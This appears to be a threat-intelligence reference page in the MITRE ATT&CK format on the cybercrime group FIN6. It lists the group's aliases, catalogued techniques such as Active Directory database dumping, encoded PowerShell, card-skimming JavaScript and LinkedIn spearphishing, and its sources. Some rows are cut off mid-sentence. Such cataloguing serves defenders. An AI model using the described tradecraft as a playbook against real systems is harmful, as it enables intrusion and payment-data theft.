FIN6
Associated Group Descriptions |
|
Name | Description |
---|---|
Skeleton Spider | (Citation: Crowdstrike Global Threat Report Feb 2018) |
TAAL | (Citation: Microsoft Threat Actor Naming July 2023) |
Camouflage Tempest | (Citation: Microsoft Threat Actor Naming July 2023) |
Magecart Group 6 | (Citation: Security Intelligence ITG08 April 2020) |
ITG08 | (Citation: Security Intelligence More Eggs Aug 2019) |
Techniques Used |
||||
Domain | ID | Name | Use | |
---|---|---|---|---|
Enterprise | T1087 | .002 | Account Discovery: Domain Account |
FIN6 has used Metasploit’s PsExec NTDSGRAB module to obtain a copy of the victim's Active Directory database.(Citation: FireEye FIN6 April 2016) |
Enterprise | T1560 | .003 | Archive Collected Data: Archive via Custom Method |
FIN6 has encoded data gathered from the victim with a simple substitution cipher and single-byte XOR using the 0xAA key, and Base64 with character permutation.(Citation: FireEye FIN6 April 2016)(Citation: Trend Micro FIN6 October 2019) |
Enterprise | T1547 | .001 | Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder |
FIN6 has used Registry Run keys to establish persistence for its downloader tools known as HARDTACK and SHIPBREAD.(Citation: FireEye FIN6 April 2016) |
Enterprise | T1110 | .002 | Brute Force: Password Cracking |
FIN6 has extracted password hashes from ntds.dit to crack offline.(Citation: FireEye FIN6 April 2016) |
Enterprise | T1059 | .001 | Command and Scripting Interpreter: PowerShell |
FIN6 has used PowerShell to gain access to merchant's networks, and a Metasploit PowerShell module to download and execute shellcode and to set up a local listener.(Citation: FireEye FIN6 April 2016)(Citation: FireEye FIN6 Apr 2019)(Citation: Visa FIN6 Feb 2019) |
.003 | Command and Scripting Interpreter: Windows Command Shell |
FIN6 has used |
||
.007 | Command and Scripting Interpreter: JavaScript |
FIN6 has used malicious JavaScript to steal payment card data from e-commerce sites.(Citation: Trend Micro FIN6 October 2019) |
||
Enterprise | T1555 | .003 | Credentials from Password Stores: Credentials from Web Browsers |
FIN6 has used the Stealer One credential stealer to target web browsers.(Citation: Visa FIN6 Feb 2019) |
Enterprise | T1074 | .002 | Data Staged: Remote Data Staging |
FIN6 actors have compressed data from remote systems and moved it to another staging system before exfiltration.(Citation: FireEye FIN6 April 2016) |
Enterprise | T1573 | .002 | Encrypted Channel: Asymmetric Cryptography |
FIN6 used the Plink command-line utility to create SSH tunnels to C2 servers.(Citation: FireEye FIN6 April 2016) |
Enterprise | T1048 | .003 | Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted Non-C2 Protocol |
FIN6 has sent stolen payment card data to remote servers via HTTP POSTs.(Citation: Trend Micro FIN6 October 2019) |
Enterprise | T1562 | .001 | Impair Defenses: Disable or Modify Tools |
FIN6 has deployed a utility script named |
Enterprise | T1070 | .004 | Indicator Removal: File Deletion |
FIN6 has removed files from victim machines.(Citation: FireEye FIN6 April 2016) |
Enterprise | T1036 | .004 | Masquerading: Masquerade Task or Service |
FIN6 has renamed the "psexec" service name to "mstdc" to masquerade as a legitimate Windows service.(Citation: FireEye FIN6 Apr 2019) |
Enterprise | T1003 | .001 | OS Credential Dumping: LSASS Memory |
FIN6 has used Windows Credential Editor for credential dumping.(Citation: FireEye FIN6 April 2016)(Citation: FireEye FIN6 Apr 2019) |
.003 | OS Credential Dumping: NTDS |
FIN6 has used Metasploit’s PsExec NTDSGRAB module to obtain a copy of the victim's Active Directory database.(Citation: FireEye FIN6 April 2016)(Citation: FireEye FIN6 Apr 2019) |
||
Enterprise | T1027 | .010 | Obfuscated Files or Information: Command Obfuscation |
FIN6 has used encoded PowerShell commands.(Citation: Visa FIN6 Feb 2019) |
Enterprise | T1588 | .002 | Obtain Capabilities: Tool |
FIN6 has obtained and used tools such as Mimikatz, Cobalt Strike, and AdFind.(Citation: Security Intelligence More Eggs Aug 2019)(Citation: FireEye FIN6 Apr 2019) |
Enterprise | T1069 | .002 | Permission Groups Discovery: Domain Groups |
FIN6 has used tools like Adfind to query users, groups, organizational units, and trusts.(Citation: FireEye FIN6 Apr 2019) |
Enterprise | T1566 | .001 | Phishing: Spearphishing Attachment |
FIN6 has targeted victims with e-mails containing malicious attachments.(Citation: Visa FIN6 Feb 2019) |
.003 | Phishing: Spearphishing via Service |
FIN6 has used fake job advertisements sent via LinkedIn to spearphish targets.(Citation: Security Intelligence More Eggs Aug 2019) |
||
Enterprise | T1021 | .001 | Remote Services: Remote Desktop Protocol |
FIN6 used RDP to move laterally in victim networks.(Citation: FireEye FIN6 April 2016)(Citation: FireEye FIN6 Apr 2019) |
Enterprise | T1053 | .005 | Scheduled Task/Job: Scheduled Task |
FIN6 has used scheduled tasks to establish persistence for various malware it uses, including downloaders known as HARDTACK and SHIPBREAD and FrameworkPOS.(Citation: FireEye FIN6 April 2016) |
Enterprise | T1553 | .002 | Subvert Trust Controls: Code Signing |
FIN6 has used Comodo code-signing certificates.(Citation: Security Intelligence More Eggs Aug 2019) |
Enterprise | T1569 | .002 | System Services: Service Execution |
FIN6 has created Windows services to execute encoded PowerShell commands.(Citation: FireEye FIN6 Apr 2019) |
Enterprise | T1204 | .002 | User Execution: Malicious File |
FIN6 has used malicious documents to lure victims into allowing execution of PowerShell scripts.(Citation: Visa FIN6 Feb 2019) |
References
- McKeague, B. et al. (2019, April 5). Pick-Six: Intercepting a FIN6 Intrusion, an Actor Recently Tied to Ryuk and LockerGoga Ransomware. Retrieved April 17, 2019.
- Visa Public. (2019, February). FIN6 Cybercrime Group Expands Threat to eCommerce Merchants. Retrieved September 16, 2019.
- FireEye Threat Intelligence. (2016, April). Follow the Money: Dissecting the Operations of the Cyber Crime Group FIN6. Retrieved June 1, 2016.
- Chen, J. (2019, October 10). Magecart Card Skimmers Injected Into Online Shops. Retrieved September 9, 2020.
- Priego, A. (2021, July). THE BROTHERS GRIM: THE REVERSING TALE OF GRIMAGENT MALWARE USED BY RYUK. Retrieved September 19, 2024.
- Klijnsma, Y. (2018, September 11). Inside the Magecart Breach of British Airways: How 22 Lines of Code Claimed 380,000 Victims. Retrieved September 9, 2020.
- Klijnsma, Y. (2018, September 19). Another Victim of the Magecart Assault Emerges: Newegg. Retrieved September 9, 2020.
- Kremez, V. (2019, September 19). FIN6 “FrameworkPOS”: Point-of-Sale Malware Analysis & Internals. Retrieved September 8, 2020.
- CrowdStrike. (2018, February 26). CrowdStrike 2018 Global Threat Report. Retrieved October 10, 2018.
- Villadsen, O.. (2019, August 29). More_eggs, Anyone? Threat Actor ITG08 Strikes Again. Retrieved September 16, 2019.
- Kennelly, J., Goody, K., Shilko, J. (2020, May 7). Navigating the MAZE: Tactics, Techniques and Procedures Associated With MAZE Ransomware Incidents. Retrieved May 18, 2020.
- Microsoft . (2023, July 12). How Microsoft names threat actors. Retrieved November 17, 2023.
- Villadsen, O. (2020, April 7). ITG08 (aka FIN6) Partners With TrickBot Gang, Uses Anchor Framework. Retrieved October 8, 2020.
Мы используем cookie-файлы, чтобы получить статистику, которая помогает нам улучшить сервис для вас с целью персонализации сервисов и предложений. Вы может прочитать подробнее о cookie-файлах или изменить настройки браузера. Продолжая пользоваться сайтом, вы даёте согласие на использование ваших cookie-файлов и соглашаетесь с Политикой обработки персональных данных.